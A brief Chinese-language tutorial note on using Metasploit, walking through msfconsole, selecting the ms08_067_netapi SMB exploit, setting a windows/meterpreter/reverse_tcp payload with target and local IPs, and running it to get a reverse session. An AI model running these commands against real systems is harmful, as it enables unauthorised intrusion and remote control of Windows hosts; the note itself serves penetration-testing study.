Exploit模块 –>漏洞利用 Payloads -->shellCode 漏洞利用后执行的代码
1. msfconsole 进入msf
show 命令展示所有漏洞
use exploit。。。(例如:use exploit/windows/smb/ms08_067_netapi)选择漏洞利用模块
2. 之后 show options 查看要填入的参数
3. set 需要填入的name(上一步查看得到) 要填的东西
4. setPAYLOAD 漏洞利用后要执行的代码(例如:set PAYLOAD windows/meterpreter/reverse_tcp)
Rhost 目标IP Lhost 本机ip
5. show options
6. set 需要填入的name(上一步查看得到) 要填的东西
7. exploit执行 如果成果 反弹回一个会话